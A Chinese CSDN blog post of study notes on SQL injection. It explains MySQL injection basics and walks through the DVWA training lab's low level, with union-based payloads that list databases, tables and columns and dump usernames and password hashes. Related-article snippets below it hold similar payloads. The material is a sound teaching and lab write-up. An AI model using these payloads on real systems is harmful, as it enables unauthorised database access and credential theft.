DVWA-sql注入学习

最新推荐文章于 2024-05-12 12:02:22 发布
最新推荐文章于 2024-05-12 12:02:22 发布
阅读量1.5k 收藏 1
点赞数 1
分类专栏: # ctf知识点总结 文章标签: ctf SQL注入
https://blog.csdn.net/qq_44657899
本文链接:https://blog.csdn.net/qq_44657899/article/details/103062555
版权

文章目录

SQL注入:

1,sql注入基础知识

sql注入基础

一,分类

报错注入,盲注,union注入等。

二,原理

sql注入漏洞需满足以下两个条件:

1,参数用户可控:前端传给后端的参数内容是用户可以改变的。

2,参数代入数据库查询:传入的参数拼接到sql语句,且代入数据库查询。

三,order by 用法

1,order by +表字段名 +【降序(desc)或默认升序】。

2,order by +表列数(也即字段)+【降序(desc)或默认升序】(sql注入时猜列表数使用的方法)。

四,information_schema数据库

在MySQL5.0版本后,MySQL默认在数据库中放一个“information_schema”的数据库,该库中schemta,tables和columns三个表名最重要。

1,schemta:储存所有数据库的库名。字段名为“schema_name”。

2,tables:储存所有的库名,和表名。字段名分别为“table_schema”和“table_name”。

3,columns:储存所有库名,表名,和字段名。字段名分别为’‘table_schema’’,’‘table_name’’,和’‘columns_name’’。

五,sql查询语句

select “要查询的字段名” from “库名.表名” where “已知字段名”=“值”。

六,limit的用法

格式为:limit m,n。其中m表示记录开始的位置,n表示取几条记录。

七,注释符

MySQL中常见的注释符有:#,- -空格,/**/。

八,内联注释

形式:/*!code*/,内联注释可以用于整个sql语句中,执行sql语句。

例子: index.php?id=15 /*!union*/ /*!select*/1,2,3。

信息函数

database() ,用于获取当前所使用的数据库信息

version():返回数据库的版本,等价于@@version

user():返回当前的用户,等价如current_user参数。

@@datadir,获取数据库的存储位置。

控制函数

load_file():从计算机中载入文件,读取文件中的数据。

into outfile:写入文件,前提是具有写入权限

concat():返回结果为连接参数产生的字符串。如果其中一个参数为null,则返回值为null。

2,DVWA之sql注入

一,low低等级

1,查列表数: 1' oeder by 2# ,输入2时没有报错,输入3时报错。

2,查数据库名,数据库为dvwa:

 1' union select 1,database() #

3,查表名,users,和guestbook:

1' union select 1,table_name from information_schema.tables where table_schema='dvwa'#

4,查列名,这里用user和password:

1' union select 1,column_name from information_schema.columns where table_schema='dvwa' and table_name='users' #

5,查字段,得到账号密码:

1' union select 1,concat(user,password) from dvwa.users#

二,medium中等级

… …

天问_Herbert555
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA平台搭建安装
m0_64037702的博客
05-10 762
DVWA平台搭建安装PhpStudy下载安装DVWA下载安装 DVWA是由PHP和MySQL开发的,首先需要在系统中搭建一个支持PHP的web服务器。这里推荐使用PhpStudy PhpStudy下载安装 百度网盘下载解压:phpstudy链接链接:https://pan.baidu.com/s/1cq1Rtz608p8bbE8FMaYvLw 提取码:ytsi dvwa链接链接:https://pan.baidu.com/s/1MjMDFXxDUl3X-fD_JH9ASg 提取码:91ur 解压下载文件至当
DVWA-SQL注入
WY92139010的博客
05-03 949
DVWA-SQL注入 一、SQL注入概念 SQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。 二、手工注入常规思路 1.判断是否存在注入,注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定回显位置 4.获取当前数据库 5.获取数据库中的表 6.获取表中的字段名 7.得到数据 三、DVWA注入分...
DVWASQL注入(低级)
heyingcheng的博客
11-17 2485
注意:我们在输入框输入id=1' order by 1#,通过改造sql语句修改了应用程序逻辑,执行的sql语句实际上数据库中执行的是:select * from 表 where id='1' order by 1 #'。由于#已经注释掉了后面所有的内容,所以实际上的效果:select * from 表 where id='1' order by 1(#也可以换成--)继续输入1’and'1'='1或者1'='1发现可以正常回显,所以目前可以十分准确的判断存在的是sql注入中的字符型注入。
DVWA通过攻略之SQL注入_dvwa sql注入
2401_84968371的博客
05-12 1182
此方法是在页面没有显示位,但是echo mysql_error();函数输出了错误信息的时候方能使用。优点是注入速度快,缺点是语句较为复杂,而且只能用limit依次进行猜解。总体来说,报错注入其实是一种公式化的注入方法,主要用于在页面中没有显示位,但是用echo mysql_error();输出了错误信息时使用。注入过程:第一步:SQL注入点探测。探测SQL注入点是关键的一步,通过适当的分析应用程序,可以判断什么地方存在SQL注入点。
SQLMAP进阶使用 --cookie
Z_l123的博客
02-19 5507
实验原理 Cookie,指某些网站为了辨别用户身份而储存在用户本地终端上的数据。Cookie在 Web应用中至关重要,用户的唯一标识session id也是存在cookie 中的。利用SQLMAP对目标网站进行检测时,默认是不带cookie 的,在一些情况下发出去的请求可能会被服务器拒之门外。这时,我们需要带上 cookie才能进行SQL注入检测。 1.访问DVWA网站 1)访问dvwa,并登录。admin password 2) 登录后,在左侧菜单点击“DVWA Security”,将DVWA
DvwaDvwa连接phpMyAdmin,在线管理并查看Dvwa后台数据库
share something here
03-22 2363
DvwaDvwa连接phpMyAdmin,在线管理查看后台数据库登录小皮面板选中Dvwa所在的站点,点击确认安装成功后,点击管理登录查看Dvwa数据库信息 登录小皮面板 从小皮面板,进入软件管理,找到phpMyAdmin,点击安装 选中Dvwa所在的站点,点击确认 等待安装 安装成功后,点击管理 登录 进入到主界面 登录后台数据库使用的默认账号密码是root root 查看 Dvwa数据库信息 可以看到有两张表,一张是guestbook,存储的是存储型XSS部分下的留言内容。第二个users存
DVWA把玩:SQL注入(完结)
weixin_43466027的博客
04-15 164
0x00 简介 一个登录框 然后我们的目标是让SQL把有用的东西(账号密码)吐出来… 0x01 low难度 首先不管有没有用先看一下网页源码: GET方法意味着我们只需要改一改网址就可以了,如果POST的话还需要用bp(或者直接在输入框里打字) 下面怎么拖库呢…? 先看看什么样的输入可以拖库: 构造载荷 ' OR '1'='1 推断查询语句类似于 SELECT first_name, last_name FROM ? WHERE user_id = '$id'; 下面看看库里有啥: 构造负荷: ' UN
DVWASQL注入
m0_67393157的博客
07-28 476
DVWA是一款基于PHP和MYSQL开发的web靶场练习平台,集成了常见的web漏洞如。
DVWA-master.zip
01-04
DVWA的"SQL注入"部分,你可以尝试通过构造恶意输入来操纵数据库查询,以获取敏感信息或执行非授权操作。这涵盖了盲注、时间基注入和错误回显等多种方法,有助于理解SQL注入的危害和防御手段。 3. **跨站脚本...
DVWA-master.7z 压缩包
09-14
- SQL注入:通过构造特定的输入,攻击者可以执行恶意的SQL命令。 - 跨站脚本(XSS):攻击者通过在网页中插入恶意脚本,使用户浏览器执行。 - 跨站请求伪造(CSRF):攻击者利用用户的已登录状态,诱使用户进行非...
DVWA-master安装包
02-28
1. **注入漏洞**:包括SQL注入、命令注入等,通过在用户输入的数据中插入恶意代码,攻击者可以获取数据库信息甚至控制服务器。 2. **跨站脚本(XSS)**:分为反射型和存储型两种,XSS允许攻击者通过注入可执行的...
DVWASQL注入详解(包含知识点)
10-20
该文档是使用DVWA平台进行的SQL注入(low)级别的详细操作和知识点分析,包括什么是SQL注入,如何进行SQL注入,图文并茂,包含了几个非常不错的操作,解决了各种问题。
DVWA靶场之SQL手工注入
pijrix的博客
09-10 670
DVWA靶场
Kali渗透测试(九)——DVWA SQL 注入
Bulldozer_GD的博客
07-16 596
Kali渗透测试(九)——DVWASQL注入 一. 低级别,没有对用户输入做任何限制,提及的数据直接拼接。 1. 查询所有数据库 2. 查询dvwa库中的表名 查询字段名 4. 查询用户名密码 5.也可以进行操作系统级别的命令执行 6.无权读取information_schema ,拒绝 union/order by 时: 猜列名:利用burpsuite Intruder 和字典文件 ' and column is null--猜表名 ' and table.user is n
DVWA-SQL Injection
tycyj的博客
01-24 99
SQL Injection LOW 服务器端核心代码 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; $result = mysqli_query($GLO
DVWA通过攻略之SQL注入
勿山几已
05-24 8556
简单介绍SQL注入,演示手工进行SQL注入及利用sqlmap进行自动化SQL注入
DVWA——SQL注入
qq_62803993的博客
01-08 2442
可以看出,点击“here to change your ID”,页面自动跳转,防御了自动化的SQL注入,分析源码可以看到,对参数没有做防御,在sql查询语句中限制啦查询条数,可以通过burpsuit抓包,修改数据包实现绕过。1.在MYSQL5.0以上版本中存在自带数据库information_schema,他是一个存储所有数据库名,表明,列名的数据库,相当于可以通过查询此库获得相应信息。根据low关卡知道存在SQL注入,这里就不多演示,我们从爆数据库开始。确定显示的位置(SQL语句查询之后的回显位置)
DVWA-------简单的SQL注入
热门推荐
weixin_53139899的博客
04-17 1万+
DVWA-----SQL注入 提示:以下是本篇文章正文内容,下面案例可供参考 一、实验目的 (1)理解SQL注入的原理; (2)学习手工注入的过程; (3)掌握SQL注入工具的使用; (4)掌握SQL注入的防御技术。 二、实验要求 1、登陆DVWA平台,结合所学SQL注入漏洞的基本知识,爆出MYSQL版本号、安装路径等信息;最终 爆出当前使用的数据库名称、数据表名称、字段名称、以及关键的字段值(比如用户名、密码等)。 2、DVWA安全级别设置为“Low”或者“Medium”,均可。 判断是否存在SQL注入
dvwa手工SQL注入
最新发布
06-26
DVWA(Damn Vulnerable Web Application)是一个非常流行的开源Web应用程序,专用于教育和演示安全漏洞,包括SQL注入。手动SQL注入是一种常见的攻击手段,当用户输入的数据被直接插入到SQL查询中,而没有适当的过滤...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值